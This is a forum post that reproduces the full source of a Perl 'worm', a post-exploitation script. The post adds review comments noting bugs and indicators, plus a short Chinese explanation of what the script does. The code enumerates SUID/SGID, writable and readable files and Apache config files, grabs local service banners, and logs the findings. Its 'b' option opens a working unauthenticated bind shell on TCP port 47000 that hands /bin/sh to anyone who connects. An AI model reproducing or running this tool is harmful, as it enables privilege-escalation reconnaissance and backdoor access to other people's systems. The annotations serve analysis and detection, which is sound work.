Perl病毒

Perl病毒



#!/usr/bin/perl
use Socket;
use IO::Socket;
###################.................
##             Intestinal worm v 0.1
#                   written by nekd0
#(c) .unl0ck research team 2004-2005
#              http://unl0ck.void.ru
###################.................

# Usage banner, printed (to STDOUT, not to the log) when no argument is given.
# The single positional argument is a string of option letters, e.g. "swa";
# each letter is matched further down with an unanchored regex, so any
# combination and order works.
# NOTE(review): the banner claims the banner-grab covers port 23, but the code
# below connects to 25 (SMTP) and never touches 23.
# NOTE(review): despite the "worm" name there is no propagation logic anywhere
# in the visible code -- this is a local host-enumeration script plus an
# unauthenticated bind shell (option b). Treat /tmp/log.txt and a listener on
# TCP/47000 as the on-host indicators.
if (@ARGV<1){
print "\n";
print "\t\tIntestinal worm v 0.1\n\n";
print "\tUsage: perl un.pl <param>\n";
print "\te.g.: perl un.pl swa\n";
print "General options:\n";
print "\to - detecting OS, open ports, get banners from 21,22,23,80,3306 ports,\n";
print "\t    if it's open\n";
print "\ts - searching for SUID, SGID files\n";
print "\tw - searching for writable files and dir's\n";
print "\tr - searching for files, which you can read\n";
print "If on machine installed Apache web server:\n";
print "\ta - searching for writable files, config's in web dir's\n";
print "Other functions:\n";
print "\tb -  bind shell on 47000 port. need if you use http shell\n";
print "\n";
exit;}



# Option dispatch. $param is the first argument; every section below tests it
# with an unanchored regex (/o/, /s/, ...) so a letter anywhere in the string
# enables that section, and several sections can run in sequence.
# All findings are appended to /tmp/log.txt through a bareword handle opened
# with the 2-arg form and never checked for failure; the file is created with
# the caller's default umask, so on most systems it is world-readable.
# No `use strict`/`use warnings`: the two variable-name typos noted below are
# therefore silent and simply disable the affected code paths.
if(@ARGV>0){
$param=$ARGV[0];
# --- option 'o': fingerprint the host from the inside -----------------------
if ($param=~/o/){open(LOG,">>/tmp/log.txt");

#Detecting OS info
# `uname -a`, then fields 0,1,2 and 8..11 of the whitespace-split
# /proc/version line. Both are obtained by shelling out via backticks.

print LOG "\n\tDetecting OS...\n\n";
$DetOS=`uname -a`;
@DetOS=split(/ /,`cat /proc/version`);
print LOG "$DetOS@DetOS[0,1,2,8,9,10,11]\n\n";
# "Open ports" is simply the raw `netstat -nt` output (numeric TCP table).
print LOG "\tOpen ports...(use netstat -nt)\n";
$netstat=`netstat -nt`;
print LOG "$netstat\n\n";
# Banner grabbing over loopback: connect, send a few newlines (or a bare GET
# for HTTP), recv up to 1000 bytes, log them raw. Every connect failure is
# silently skipped because only the truthiness of the socket is checked.
print LOG "Get banners from 21,22,25,80,3306 ports, if it's open...\n";
$ftpd=IO::Socket::INET->new(PeerAddr=>"localhost",PeerPort=>"21",Proto=>'tcp');
        if ($ftpd) {$ftpd->send("\n");
                        $ftpd->recv($ftpd_answer,1000);
                        print LOG "From ftpd(21 port) recived that answer: $ftpd_answer\n ";
                        close($ftpd);        }
$sshd=IO::Socket::INET->new(PeerAddr=>"localhost",PeerPort=>"22",Proto=>'tcp');
        if ($sshd){$sshd->send("\n\n\n");
                        $sshd->recv($sshd_answer,1000);
                        print LOG "From sshd(22 port) recived that answer: $sshd_answer\n";
                        close($sshd);
                        }
# BUG: the socket is stored in $smptd (typo) but $smtpd is tested, so this
# branch never executes and no SMTP banner is ever logged.
$smptd=IO::Socket::INET->new(PeerAddr=>"localhost",PeerPort=>"25",Proto=>'tcp');
        if($smtpd){$smtpd->send("\n\n\n");
                        $smtpd->recv($smtpd_answer,1000);
                        print LOG "From smtpd(25 port) recived that answer: $smtpd_answer\n";
                        close($smtpd);}
# BUG: the response is slurped into @httpd_amswer (typo) but @httpd_answer is
# iterated, so the "Server:" header is never logged either. The request also
# uses bare "\n" line endings instead of the "\r\n" HTTP expects.
$httpd=IO::Socket::INET->new(PeerAddr=>"localhost",PeerPort=>"80",Proto=>'tcp');
        if ($httpd){$httpd->send("GET / HTTP/1.0\n\n");
                        @httpd_amswer=<$httpd>;
                        close($httpd);
                        foreach $httpd_answer(@httpd_answer){if ($httpd_answer=~/Server:/)
                        {print LOG "From httpd(80 port) recived that answer: $httpd_answer\n";}}}
# Whatever MySQL sends back (binary handshake included) is written to the log as-is.
$mysqld=IO::Socket::INET->new(PeerAddr=>"localhost",PeerPort=>"3306",Proto=>'tcp');
        if ($mysqld){$mysqld->send("\n\n\n");
                        $mysqld->recv($mysqld_answer,1000);
                        close($mysqld);
                        print LOG "From mysqld(3306 port) recived that answer: $mysqld_answer\n";}
close(LOG);}


#Searching for writable files, suid and sgid.
# --- options 'w', 's', 'r': walk the whole filesystem from "/" -------------
# The walk is hand-rolled on top of the *text output* of `ls -F` instead of
# opendir/readdir. Consequences that follow directly from that choice:
#   * dot-files are never listed (no -a), so hidden entries are skipped;
#   * the directory name is interpolated unquoted into a shell command, so a
#     name containing spaces or shell metacharacters breaks the walk (or is
#     executed as shell);
#   * `ls -F` appends a type marker to every non-plain entry ("/" directory,
#     "*" executable, "@" symlink, "|" FIFO). The code relies on the "/" for
#     path joining, but the other markers become part of the path, so the
#     file tests below stat a name that does not exist and fail. Symlinks are
#     thus never followed, and -- since every SUID/SGID binary is executable
#     -- the 's' scan can only ever report SGID directories, never binaries;
#     'w' and 'r' only see non-executable regular files and directories.
if ($param=~/w/ or $param=~/s/ or $param=~/r/){
open(LOG,">>/tmp/log.txt");
$start="/";
if ($param=~/w/){print LOG "\n\tSearching for writable files...\n\n";}
if ($param=~/s/){print LOG "\n\tSearching for SUID, SGID files...\n\n";}
if ($param=~/r/){print LOG "\n\tSearching for files, wich you can read...\n\n";}
@files=split(/\n/,`ls -F $start`);

# First level: only directories are queued (as "//name/"); the top-level
# entries themselves are not tested.
foreach $file(@files)
        {$pathtofile="$start/$file";
        if (-d $pathtofile){push (@globaldirs,$pathtofile);}}
# Breadth-first expansion by pushing onto @globaldirs *while a foreach is
# iterating over it*. perlsyn documents modifying the array being iterated as
# unsupported; it tends to work in practice, which is what the code depends
# on. @globaldirs is a package global that is never emptied, so the 'a'
# section below re-walks everything queued here when options are combined.
foreach $filename(@globaldirs){

        @files=split(/\n/,`ls -F $filename`);
        foreach $file(@files)
                # Path join relies on the trailing "/" from ls -F (see note above).
                {$file="$filename$file";
                if (-d $file){push (@globaldirs,$file);}
                if ($param=~/w/)
                {if ((-d $file) and (-w $file)){print LOG "Dir $file is writable\n";}
                if ((-w $file) and (not(-d $file))){print LOG "File $file is writable\n";}}
                if ($param=~/s/){if (-u $file){print LOG "File $file is SUID\n";}
                                if (-g $file){print LOG "File $file is SGID\n";}}
                # 'r' logs every readable entry it reaches -- essentially a file listing.
                if ($param=~/r/){if (-r $file){print LOG "You can read $file.\n"}}
                }

        }
close(LOG);}


#Special for apache web server
#Searching for writable files in
#web dirs.
# --- option 'a' (tested against $ARGV[0], same value as $param) ------------
# Extract DocumentRoot values from a hard-coded httpd.conf path, then run the
# same ls -F walk under each document root, additionally flagging names that
# contain config.inc.php / config.php (typical credential files).
if ($ARGV[0]=~/a/)
        {$pathtohttpdconf="/usr/local/apache/conf/httpd.conf"; #default httpd.conf path
        if (-e $pathtohttpdconf){
        open(HTTP,"$pathtohttpdconf");
        @conf=<HTTP>;
        close(HTTP);
        # Unanchored match: any line containing "DocumentRoot /" qualifies,
        # including commented-out examples.
        foreach $conf(@conf)
                {
                chomp($conf);
                if ($conf=~/DocumentRoot \//)
                        {push (@users,$conf);}}
        # Split on the first space and keep the remainder. This yields a usable
        # path only for an unindented, unquoted directive: an indented or
        # "#"-prefixed line produces garbage, and a quoted value keeps its
        # quotes, so the later `ls` on it fails silently and finds nothing.
        foreach $users(@users)
                {@dir=split(/ /,$users, 2);push (@webdirs,@dir[1]);}

open(LOG,">>/tmp/log.txt");
print LOG  "\n\tSearching for writable files in web dir's...\n\n\n";
foreach $start(@webdirs){
@files=split(/\n/,`ls -F $start`);
foreach $file(@files)
        {$pathtofile="$start/$file";
        if (-d $pathtofile){push (@globaldirs,$pathtofile);}}
# Same walk and same caveats as the 'w/s/r' section (type-marker suffixes,
# foreach over a growing array). @globaldirs is not cleared between document
# roots or after the earlier scan, so every root re-walks all directories
# seen so far and the log fills with duplicates.
foreach $filename(@globaldirs){

        @files=split(/\n/,`ls -F $filename`);
        foreach $file(@files)
                {$file="$filename$file";
                if (-d $file){push (@globaldirs,$file);}
                if ((-d $file) and (-w $file)){print LOG "Dir $file is writable\n";}
                if ((-w $file) and (not(-d $file))){print LOG "File $file is writable\n";}
                # Unescaped "." in the patterns; any name containing the substring matches.
                if ($file=~/config.inc.php/ or $file=~/config.php/){print LOG "Config $file founded.\n";}
                }

                        }
        close(LOG);}
        }
        # This exit aborts the whole run: with e.g. "ab" and no httpd.conf at
        # the hard-coded path, the bind shell below is never started.
        else {print "Httpd.conf not found. Please use correct path to httpd.conf\n";exit;}
        }

# --- option 'b': forking bind shell -----------------------------------------
# Listens on 0.0.0.0:47000 (SO_REUSEADDR, backlog 50). For every accepted
# connection a child is forked whose STDIN/STDOUT/STDERR are the client socket
# and which exec's an interactive /bin/sh. There is no authentication of any
# kind: whoever can reach TCP/47000 gets a shell with this process's uid.
# None of socket/bind/listen/accept is error-checked, and the accept loop
# never terminates, so this must be the last option processed (it is).
if ($param=~/b/)
                 {
                 $p=47000;
                 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
                 setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
                 bind(S,sockaddr_in($p,INADDR_ANY));
                 listen(S,50);
                 while(1){accept(X,S);
                 # fork returns 0 in the child and undef on failure; both are false
                 # here. The undef case is then caught and exit(0)s -- i.e. a single
                 # failed fork terminates the *listener* itself. The parent never
                 # waits on children (no waitpid or $SIG{CHLD} visible), so each
                 # finished session leaves a zombie.
                 if(!($pid=fork)){if(!defined $pid){exit(0);}
                 open STDIN,"<&X";
                 open STDOUT,">&X";
                 open STDERR,">&X";
                 exec("/bin/sh -i");
                 # Reached only if exec fails: the child closes X and falls back into
                 # the while(1) loop, becoming a second process accepting on S.
                 close X;}}
                 }


}

太长了……能说说它运行后会怎么样吗？（从贴出的代码看：它并不会自我传播，"病毒/蠕虫"只是名字。它是一个本地信息收集脚本——按参数字母分别收集内核版本、`netstat -nt` 端口表和本机 21/22/25/80/3306 的服务 banner，枚举 SUID/SGID、可写、可读的文件，以及 Apache DocumentRoot 下的可写文件和 config.php 类配置文件，结果全部追加写入 /tmp/log.txt；参数 b 则在 TCP 47000 端口监听，对任何连上来的人直接 exec `/bin/sh -i`，没有任何认证。）